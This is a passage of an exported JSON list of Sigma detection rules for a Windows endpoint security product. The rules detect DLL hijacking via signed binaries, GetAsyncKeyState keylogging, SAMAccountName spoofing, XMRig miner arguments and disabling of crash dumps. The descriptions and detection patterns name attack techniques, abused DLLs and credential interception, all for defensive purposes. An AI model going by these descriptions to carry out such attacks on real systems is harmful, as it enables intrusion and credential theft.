"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_lpksetup.yml",
"content": "title: DLL Hijacking via lpksetup.exe\nid: 9308fb68-80cf-4c43-b472-4fd3579d707c\ndescription: |\n Detects potential Windows DLL Hijacking via lpksetup.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'lpksetup.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\CRYPTBASE.dll'\n - '\\dpx.dll'\n - '\\lpksetupproxyserv.dll'\n - '\\rsaenh.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9308fb68-80cf-4c43-b472-4fd3579d707c",
"rule_name": "DLL Hijacking via lpksetup.exe",
"rule_description": "Detects potential Windows DLL Hijacking via lpksetup.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "933b39f4-d353-4ace-b166-4b9d83517edb",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.590184Z",
"creation_date": "2026-03-23T11:45:34.590190Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.590202Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_presentationsettings.yml",
"content": "title: DLL Hijacking via presentationsettings.exe\nid: 933b39f4-d353-4ace-b166-4b9d83517edb\ndescription: |\n Detects potential Windows DLL Hijacking via presentationsettings.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'presentationsettings.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\mmdevapi.dll'\n - '\\propsys.dll'\n - '\\shell32.dll'\n - '\\SspiCli.dll'\n - '\\windows.storage.dll'\n - '\\windowscodecs.dll'\n - '\\winmm.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "933b39f4-d353-4ace-b166-4b9d83517edb",
"rule_name": "DLL Hijacking via presentationsettings.exe",
"rule_description": "Detects potential Windows DLL Hijacking via presentationsettings.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "934952a1-0688-4084-87a4-21dfd45e1e51",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.295949Z",
"creation_date": "2026-03-23T11:45:35.295952Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.295958Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://unit42.paloaltonetworks.com/kimsuky-new-keylogger-backdoor-variant/",
"https://blog.sekoia.io/darkgate-internals/",
"https://www.uptycs.com/blog/threat-research-report-team/warzone-rat-comes-with-uac-bypass-technique",
"https://www.cybereason.com/blog/research/back-to-the-future-inside-the-kimsuky-kgh-spyware-suite",
"https://attack.mitre.org/techniques/T1056/001/"
],
"name": "t1056_001_getasynckeystate_keylogger.yml",
"content": "title: Possible GetAsyncKeyState Keylogger\nid: 934952a1-0688-4084-87a4-21dfd45e1e51\ndescription: |\n Detects a suspicious call to the GetAsyncKeyState API.\n This API determines whether a key is up or down at the time the function is called, and whether the key was pressed after a previous call to GetAsyncKeyState.\n Adversaries may use this API in order to log user keystrokes and intercept credentials as the user types them.\n It is recommended to check the process which called GetAsyncKeyState for suspicious activities.\nreferences:\n - https://unit42.paloaltonetworks.com/kimsuky-new-keylogger-backdoor-variant/\n - https://blog.sekoia.io/darkgate-internals/\n - https://www.uptycs.com/blog/threat-research-report-team/warzone-rat-comes-with-uac-bypass-technique\n - https://www.cybereason.com/blog/research/back-to-the-future-inside-the-kimsuky-kgh-spyware-suite\n - https://attack.mitre.org/techniques/T1056/001/\ndate: 2025/04/29\nmodified: 2026/12/16\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.collection\n - attack.t1056.001\n - classification.Windows.Source.Win32kGetAsyncKeyState\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.Collection\n - classification.Windows.Behavior.Keylogger\nlogsource:\n product: windows\n category: win32k_getasynckeystate\ndetection:\n selection:\n AgentVersion|gte|version: 4.9.0\n # Keyloggers frequently invoke GetAsyncKeyState to achieve high-precision keystroke capture\n BackgroundCallCount|gt: 1000000\n Image|startswith:\n - '?:\\Users\\'\n - '?:\\Windows\\'\n - '?:\\ProgramData\\'\n - '?:\\\\?Recycle.Bin\\'\n\n exclusion_other_signed_program:\n ProcessSigned: 'true'\n ProcessSignature:\n - 'NVIDIA Corporation'\n - 'SOC Informatique'\n - 'Cisco WebEx LLC'\n - 'Skyline Software Systems Inc'\n - 'Skyline Software Systems, Inc'\n - 'VNG CORPORATION'\n - 'YNYNG LLC'\n - 'Progress Software Corporation'\n - 'Dedalus Italia S.P.A.'\n - 'Oracle America, Inc.'\n - 
'ANSYS Inc.'\n - 'A K I O SAS'\n - 'AKIO SAS'\n - 'Nenad Hrg'\n - 'Adobe Inc.'\n - 'Tixeo SAS'\n - 'Esm Software'\n - 'LogMeIn, Inc.'\n - 'Environmental Systems Research Institute, Inc.'\n - 'Klee Commerce SAS'\n - 'Biesse S.p.A'\n - 'CarrierX LLC'\n - 'Microsoft Windows Publisher'\n - 'Microsoft Windows'\n - 'Microsoft Corporation'\n\n exclusion_optimot:\n ProcessSha256: '9622289397f00c03f0cb78dbff1ae2f40aeb1f688ab754809e5caeb3f58a77ac'\n\n exclusion_gcti:\n ProcessCompany: 'Genesys Telecommunications Laboratories, Inc.'\n ProcessProcessName:\n - 'GenesysSoftphone.exe'\n - 'InteractionWorkspaceSIPEndpoint.exe'\n\n exclusion_avob:\n ProcessOriginalFileName: 'Photoshop.exe'\n ProcessCompany : 'adobe'\n\n exclusion_i_fourc:\n ProcessOriginalFileName: 'JIM.exe'\n ProcessCompany : 'I-FourC®'\n\n exclusion_arcplus:\n ProcessOriginalFileName: 'arcplus.exe'\n ProcessCompany : 'ARC Technology'\n\n exclusion_netgeo:\n ProcessOriginalFileName: 'GI.Netgeo.UI.exe'\n ProcessCompany : 'GiSmartware'\n\n exclusion_4d:\n ProcessOriginalFileName:\n - '4D.exe'\n - '4D_WS.exe'\n ProcessCompany : '4D'\n ProcessDescription: '4e Dimension'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "934952a1-0688-4084-87a4-21dfd45e1e51",
"rule_name": "Possible GetAsyncKeyState Keylogger",
"rule_description": "Detects a suspicious call to the GetAsyncKeyState API.\nThis API determines whether a key is up or down at the time the function is called, and whether the key was pressed after a previous call to GetAsyncKeyState.\nAdversaries may use this API in order to log user keystrokes and intercept credentials as the user types them.\nIt is recommended to check the process which called GetAsyncKeyState for suspicious activities.\n",
"rule_creation_date": "2025-04-29",
"rule_modified_date": "2026-12-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection",
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1056.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "934d8149-fd57-4838-bcb1-80f8369b603d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.611313Z",
"creation_date": "2026-03-23T11:45:34.611317Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.611325Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing",
"https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html",
"https://cloudbrothers.info/en/exploit-kerberos-samaccountname-spoofing/",
"https://attack.mitre.org/techniques/T1078/002/"
],
"name": "t1078_002_samaccountname_spoofing.yml",
"content": "title: SAM AccountName Spoofed\nid: 934d8149-fd57-4838-bcb1-80f8369b603d\ndescription: |\n Detects potential exploitation of CVE-2021-42278, an Active Directory Domain Services Elevation of Privilege Vulnerability.\n Exploitation of this vulnerability results in the ability to change a machine account SAMAccountName attribute to a domain controller's name without the trailing \"$\".\n In combination with CVE-2021-42287, it allows attackers to impersonate a domain controller account.\nreferences:\n - https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing\n - https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html\n - https://cloudbrothers.info/en/exploit-kerberos-samaccountname-spoofing/\n - https://attack.mitre.org/techniques/T1078/002/\ndate: 2021/12/13\nmodified: 2024/03/12\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1078.002\n - cve.2021-42278\n - classification.Windows.Source.EventLog\n - classification.Windows.Exploit.CVE-2021-42278\n - classification.Windows.Exploit.SAMAccountName\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n service: security\ndetection:\n selection:\n EventID: 4781\n OldTargetUserName|endswith: '$'\n\n filter_newtarget:\n NewTargetUserName|endswith: '$'\n\n condition: selection and not 1 of filter_*\nlevel: critical\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "934d8149-fd57-4838-bcb1-80f8369b603d",
"rule_name": "SAM AccountName Spoofed",
"rule_description": "Detects potential exploitation of CVE-2021-42278, an Active Directory Domain Services Elevation of Privilege Vulnerability.\nExploitation of this vulnerability results in the ability to change a machine account SAMAccountName attribute to a domain controller's name without the trailing \"$\".\nIn combination with CVE-2021-42287, it allows attackers to impersonate a domain controller account.\n",
"rule_creation_date": "2021-12-13",
"rule_modified_date": "2024-03-12",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1078.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "93d39164-301b-4198-86a9-0707c82a3347",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.609707Z",
"creation_date": "2026-03-23T11:45:34.609711Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.609719Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://xmrig.com/docs/miner/command-line-options",
"https://attack.mitre.org/techniques/T1496/"
],
"name": "t1496_xmrig_cryptominer_commandline_args_windows.yml",
"content": "title: Possible XMRig Execution (Windows)\nid: 93d39164-301b-4198-86a9-0707c82a3347\ndescription: |\n Detects suspicious arguments in a command-line potentially linked to XMRig cryptominer.\n XMRig is an open source cryptominer used by adversaries to mine cryptocurrency on victim systems.\n It is recommended to determine whether the execution of this tool is legitimate and to start remediative actions if necessary.\nreferences:\n - https://xmrig.com/docs/miner/command-line-options\n - https://attack.mitre.org/techniques/T1496/\ndate: 2022/11/15\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.impact\n - attack.t1496\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.CryptoMiner.XMRig\n - classification.Windows.Behavior.CryptoMiner\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n CommandLine|contains:\n - ' --rig-id'\n - ' --argon2-impl'\n - ' --donate-level='\n - ' --max-cpu-usage='\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "93d39164-301b-4198-86a9-0707c82a3347",
"rule_name": "Possible XMRig Execution (Windows)",
"rule_description": "Detects suspicious arguments in a command-line potentially linked to XMRig cryptominer.\nXMRig is an open source cryptominer used by adversaries to mine cryptocurrency on victim systems.\nIt is recommended to determine whether the execution of this tool is legitimate and to start remediative actions if necessary.\n",
"rule_creation_date": "2022-11-15",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.impact"
],
"rule_technique_tags": [
"attack.t1496"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "93f0ca06-4450-4e9b-a680-a037d640b553",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.619123Z",
"creation_date": "2026-03-23T11:45:34.619125Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.619129Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_vaultcmd.yml",
"content": "title: DLL Hijacking via vaultcmd.exe\nid: 93f0ca06-4450-4e9b-a680-a037d640b553\ndescription: |\n Detects potential Windows DLL Hijacking via vaultcmd.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'vaultcmd.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\userenv.dll'\n - '\\VAULTCLI.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "93f0ca06-4450-4e9b-a680-a037d640b553",
"rule_name": "DLL Hijacking via vaultcmd.exe",
"rule_description": "Detects potential Windows DLL Hijacking via vaultcmd.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "94256ed3-174c-46be-b5df-97c9d5d3af5a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.621483Z",
"creation_date": "2026-03-23T11:45:34.621485Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.621489Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://blog.malwarebytes.com/threat-intelligence/2022/03/hermeticwiper-a-detailed-analysis-of-the-destructive-malware-that-targeted-ukraine/",
"https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine/",
"https://attack.mitre.org/techniques/T1562/001/"
],
"name": "t1562_001_windows_crash_dump_disable_registry.yml",
"content": "title: Crash Dumps Mechanism Disabled\nid: 94256ed3-174c-46be-b5df-97c9d5d3af5a\ndescription: |\n Detects the Crash Dumps mechanism being disabled.\n Attackers can disable the crash dump mechanism to prevent Administrators from easily finding the reason of a system crash which could be linked to their malicious activities.\n It is recommended to ensure the legitimacy of this policy change.\nreferences:\n - https://blog.malwarebytes.com/threat-intelligence/2022/03/hermeticwiper-a-detailed-analysis-of-the-destructive-malware-that-targeted-ukraine/\n - https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine/\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2022/03/16\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.SystemModification\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: 'SetValue'\n TargetObject: 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\CrashControl\\CrashDumpEnabled'\n Details: 'DWORD (0x00000000)'\n\n exclusion_from_graphical_interface:\n # via sysdm.cpl > Advanced > Settings > Write Debugging information\n Image: '?:\\Windows\\system32\\SystemPropertiesAdvanced.exe'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: 
'?:\\Windows\\System32\\services.exe'\n\n exclusion_opti:\n ProcessParentCommandLine|contains: '?:\\temp\\WS2016Optimisations.ps1'\n\n exclusion_citrix:\n ProcessOriginalFileName: 'CitrixOptimizerTool.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Citrix Systems, Inc.'\n\n exclusion_wmi:\n ProcessImage: '?:\\Windows\\System32\\wbem\\WmiPrvSE.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "94256ed3-174c-46be-b5df-97c9d5d3af5a",
"rule_name": "Crash Dumps Mechanism Disabled",
"rule_description": "Detects the Crash Dumps mechanism being disabled.\nAttackers can disable the crash dump mechanism to prevent Administrators from easily finding the reason for a system crash which could be linked to their malicious activities.\nIt is recommended to ensure the legitimacy of this policy change.\n",
"rule_creation_date": "2022-03-16",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "94503606-01d9-4e36-b05c-7ddbadadf645",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.095181Z",
"creation_date": "2026-03-23T11:45:34.095183Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.095187Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://wojciechregula.blog/post/macos-red-teaming-initial-access-via-applescript-url/",
"https://gist.github.com/Metnew/09a50c38d398c482b2df59082f0d13c6",
"https://attack.mitre.org/techniques/T1059/002/",
"https://attack.mitre.org/techniques/T1033/"
],
"name": "t1059_002_osascript_spawn_process.yml",
